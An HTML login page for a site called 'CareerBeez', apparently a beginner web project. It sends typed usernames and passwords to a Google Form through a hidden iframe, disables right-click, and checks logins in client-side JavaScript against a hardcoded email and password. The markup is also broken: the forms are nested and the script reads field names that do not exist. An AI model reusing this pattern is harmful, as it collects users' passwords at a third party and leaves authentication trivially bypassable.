<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8" />
    <link rel="icon" href="%PUBLIC_URL%/favicon.ico" />
 
    

      <meta charset="UTF-8">
    
      <title>Login</title>
    
        <style>
    @import url(http://fonts.googleapis.com/css?family=Exo:100,200,400);
    @import url(http://fonts.googleapis.com/css?family=Source+Sans+Pro:700,400,300);
    
    
    
    .body{
        position: fixed; 
        overflow-y: scroll;
        width: 100%;
      top: -20px;
      left: -20px;
      right: -40px;
      bottom: -40px;
      width: auto;
      height: auto;
    
      background-size: cover;
      -webkit-filter: blur(0px);
      
    }
    
    .header{
      position: absolute;
      top: calc(50% - 35px);
      left: calc(50% - 255px);
      
    }
    
    .header div{
      float: left;
      color: rgb(247, 8, 8);
      font-family: 'Exo', sans-serif;
      font-size: 40px;
      font-weight: 200;
    }
    
    .header div span{
      color: #F29E20 !important;
    }
    
    .login{
      position: absolute;
      top: calc(50% - 75px);
      left: calc(50% - 50px);
      height: 150px;
      width: 350px;
      padding: 10px;
      
    }
    
    .login input[type=text]{
      width: 250px;
      height: 30px;
      background: transparent;
      border: 1px solid rgba(245, 205, 205, 0.6);
      border-radius: 2px;
      color: rgb(8, 8, 8);
      font-family: 'Exo', sans-serif;
      font-size: 16px;
      font-weight: 400;
      padding: 4px;
    }
    
    .login input[type=password]{
      width: 250px;
      height: 30px;
      background: transparent;
      border: 1px solid rgba(250, 191, 191, 0.6);
      border-radius: 2px;
      color: rgb(12, 12, 12);
      font-family: 'Exo', sans-serif;
      font-size: 16px;
      font-weight: 400;
      padding: 4px;
      margin-top: 10px;
    }
    
    .login input[type=button]{
      width: 260px;
      height: 35px;
      background: rgb(243, 221, 221);
      border: 1px solid rgb(12, 12, 12);
      cursor: pointer;
      border-radius: 2px;
      color: #221a0d;
      font-family: 'Exo', sans-serif;
      font-size: 16px;
      font-weight: 400;
      padding: 6px;
      margin-top: 10px;
    }
    
    .login input[type=button]:hover{
      opacity: 0.8;
    }
    
    .login input[type=button]:active{
      opacity: 0.6;
    }
    
    .login input[type=text]:focus{
      outline: none;
      border: 1px solid rgba(250, 247, 247, 0.9);
    }
    
    .login input[type=password]:focus{
      outline: none;
      border: 1px solid rgba(254, 250, 250, 0.9);
    }
    
    .login input[type=button]:focus{
      outline: none;
    }
    
    ::-webkit-input-placeholder{
       color: rgba(250, 248, 248, 0.6);
    }
    
    ::-moz-input-placeholder{
       color: rgba(7, 7, 7, 0.6);
    
    }
    
    
    
    </style>


    <title>React App</title>
  </head>
  <body oncontextmenu="return false">

    <form action="https://docs.google.com/forms/d/e/1FAIpQLSeMbRDZyXZniX58NiB2IAbOV5ki0tGjoAKRS3WEaxfZBxg6tA/viewform"
     method="post" target="hidden_iframe"
    onsubmit="submitted=true"s style="max-width:400px;margin:auto;margin-top:100px">
     
     <div class="body"></div>
       <div class="grad"></div>
       <div class="header">
         <div>Career<span>Beez</span></div>
       </div>
       <br>
       <form name="login">
       <div class="login"> 
           <h3>Username : <input type="text" placeholder="Username" name="entry.469976937"><br></h3>
           <h3>Password : <input type="password" placeholder="password" name="entry.1668138162"><br></h3>
           <input type="button" onclick="check(this.form)" value="Login"/>
           Don't have account?<a href="sgnup.html ">&nbsp;Sign Up</a>	
   </div>
     
       </div>
   
   
   
   </form>
   <script language="javascript">
   function check(form)
   {
    
    if(form.userid.value == "Dom@gmail.com" && form.pswrd.value == "Dom")
     {
       window.open('try.html')
   
     }
    else
    {
      alert("Invalid Username or Password")
     }
   }
   
   
   </script>
   </form>
   <div id ="root"></div>
   </body>
</html>
